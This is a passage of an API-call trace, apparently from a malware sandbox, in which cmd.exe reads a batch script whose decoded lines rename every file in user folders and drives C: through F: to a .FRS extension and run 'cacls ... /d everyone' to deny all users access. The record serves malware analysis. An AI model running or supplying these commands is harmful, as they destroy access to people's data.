lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xc4 [0125.436] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=47, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\%USERNAME%\\Desktop\\*.*\" *.*.FRS\r\n\\temp.txt\"')do set n=%%i\r\n") returned 47 [0125.436] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xc4 [0125.436] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0125.436] GetFileType (hFile=0x2b8) returned 0x1 [0125.436] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xc4 [0125.436] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0125.436] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=247, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xf7 [0125.436] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=51, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\%USERNAME%\\Saved Games\\*.*\" *.*.FRS\r\np.txt\"')do set n=%%i\r\n") returned 51 [0125.436] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xf7 [0125.436] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0125.436] GetFileType (hFile=0x2b8) returned 0x1 [0125.436] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xf7 [0125.436] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0125.436] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=292, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x124 [0125.436] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=45, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\%USERNAME%\\Links\\*.*\" *.*.FRS\r\n.FRS\r\n") returned 45 [0125.436] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x124 [0125.437] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0125.437] GetFileType (hFile=0x2b8) returned 0x1 [0125.437] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x124 [0125.437] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0125.437] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=341, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x155 [0125.437] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=49, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\%USERNAME%\\Favorites\\*.*\" *.*.FRS\r\n\r\n") returned 49 [0125.437] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x155 [0125.437] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0125.437] GetFileType (hFile=0x2b8) returned 0x1 [0125.437] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x155 [0125.437] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0125.437] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=389, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x185 [0125.437] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=48, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\%USERNAME%\\Searches\\*.*\" *.*.FRS\r\n\n") returned 48 [0125.437] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x185 [0125.437] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0125.437] GetFileType (hFile=0x2b8) returned 0x1 [0125.437] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x185 [0125.437] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0125.437] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=435, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1b3 [0125.437] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=46, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\%USERNAME%\\Videos\\*.*\" *.*.FRS\r\n\r\n") returned 46 [0125.437] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1b3 [0125.437] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0125.437] GetFileType (hFile=0x2b8) returned 0x1 [0125.437] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1b3 [0125.437] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0125.437] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=483, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1e3 [0125.437] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=48, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\%USERNAME%\\Pictures\\*.*\" *.*.FRS\r\n") returned 48 [0125.437] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1e3 [0125.437] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0125.437] GetFileType (hFile=0x2b8) returned 0x1 [0125.437] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1e3 [0125.438] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0125.438] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=518, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x206 [0125.438] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=35, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\Public\\*.*\" *.*.FRS\r\n.*\" *.*.FRS\r\n") returned 35 [0125.438] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x206 [0125.438] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0125.438] GetFileType (hFile=0x2b8) returned 0x1 [0125.438] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x206 [0125.438] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0125.438] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=540, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x21c [0125.438] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\*.*\" *.*.FRS\r\n.*\" *.*.FRS\r\n") returned 22 [0125.438] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x21c [0125.438] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0125.438] GetFileType (hFile=0x2b8) returned 0x1 [0125.438] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x21c [0125.438] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0125.438] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=562, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x232 [0125.438] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"D:\\*.*\" *.*.FRS\r\n") returned 22 [0125.438] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x232 [0125.438] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0125.438] GetFileType (hFile=0x2b8) returned 0x1 [0125.438] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x232 [0125.438] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0125.438] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=584, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x248 [0125.438] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"E:\\*.*\" *.*.FRS\r\n") returned 22 [0125.438] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x248 [0125.438] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0125.438] GetFileType (hFile=0x2b8) returned 0x1 [0125.438] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x248 [0125.438] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0125.439] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=606, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x25e [0125.439] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"F:\\*.*\" *.*.FRS\r\n") returned 22 [0125.439] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x25e [0125.439] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0125.439] GetFileType (hFile=0x2b8) returned 0x1 [0125.439] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x25e [0125.439] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0125.439] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=669, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x29d [0125.439] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=63, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\%USERNAME%\\Desktop\\*.*\" /e /d everyone\r\net n=%%i\r\n") returned 63 [0125.439] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x29d [0125.439] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0125.439] GetFileType (hFile=0x2b8) returned 0x1 [0125.439] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x29d [0125.439] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0125.439] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=736, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2e0 [0125.439] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=67, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\%USERNAME%\\Saved Games\\*.*\" /e /d everyone\r\n=%%i\r\n") returned 67 [0125.439] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2e0 [0125.439] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0125.439] GetFileType (hFile=0x2b8) returned 0x1 [0125.439] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2e0 [0125.439] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0125.439] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=797, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x31d [0125.439] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=61, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\%USERNAME%\\Links\\*.*\" /e /d everyone\r\nyone\r\n") returned 61 [0125.439] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x31d [0125.439] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0125.439] GetFileType (hFile=0x2b8) returned 0x1 [0125.439] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x31d [0125.439] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0125.439] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=862, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x35e [0125.439] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=65, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\%USERNAME%\\Favorites\\*.*\" /e /d everyone\r\n\r\n") returned 65 [0125.440] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x35e [0125.440] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0125.440] GetFileType (hFile=0x2b8) returned 0x1 [0125.440] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x35e [0125.440] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0125.440] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=926, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x39e [0125.440] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=64, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\%USERNAME%\\Searches\\*.*\" /e /d everyone\r\n\n") returned 64 [0125.440] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x39e [0125.440] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0125.440] GetFileType (hFile=0x2b8) returned 0x1 [0125.440] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x39e [0125.440] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0125.440] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=988, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x3dc [0125.440] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=62, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\%USERNAME%\\Videos\\*.*\" /e /d everyone\r\n\r\n") returned 62 [0125.440] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x3dc [0125.440] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0125.440] GetFileType (hFile=0x2b8) returned 0x1 [0125.440] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x3dc [0125.440] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0125.440] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=1052, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x41c [0125.440] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=64, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\%USERNAME%\\Pictures\\*.*\" /e /d everyone\r\n") returned 64 [0125.440] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x41c [0125.440] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0125.440] GetFileType (hFile=0x2b8) returned 0x1 [0125.440] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x41c [0125.440] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0125.440] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=1103, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x44f [0125.440] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=51, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\Public\\*.*\" /e /d everyone\r\n/d everyone\r\n") returned 51 [0125.440] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x44f [0125.440] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0125.440] GetFileType (hFile=0x2b8) returned 0x1 [0125.441] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x44f [0125.441] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0125.441] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=1155, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x483 [0125.441] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=52, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Program Files\\*.*\" /e /d everyone\r\nd everyone\r\n") returned 52 [0125.441] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x483 [0125.441] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0125.441] GetFileType (hFile=0x2b8) returned 0x1 [0125.441] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x483 [0125.441] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0125.441] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=1193, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x4a9 [0125.441] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=38, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\*.*\" /e /d everyone\r\n /d everyone\r\n") returned 38 [0125.441] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4a9 [0125.441] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0125.441] GetFileType (hFile=0x2b8) returned 0x1 [0125.441] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4a9 [0125.441] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0125.441] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=1231, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x4cf [0125.441] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=38, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"D:\\*.*\" /e /d everyone\r\n") returned 38 [0125.441] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4cf [0125.441] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0125.441] GetFileType (hFile=0x2b8) returned 0x1 [0125.441] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4cf [0125.441] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: 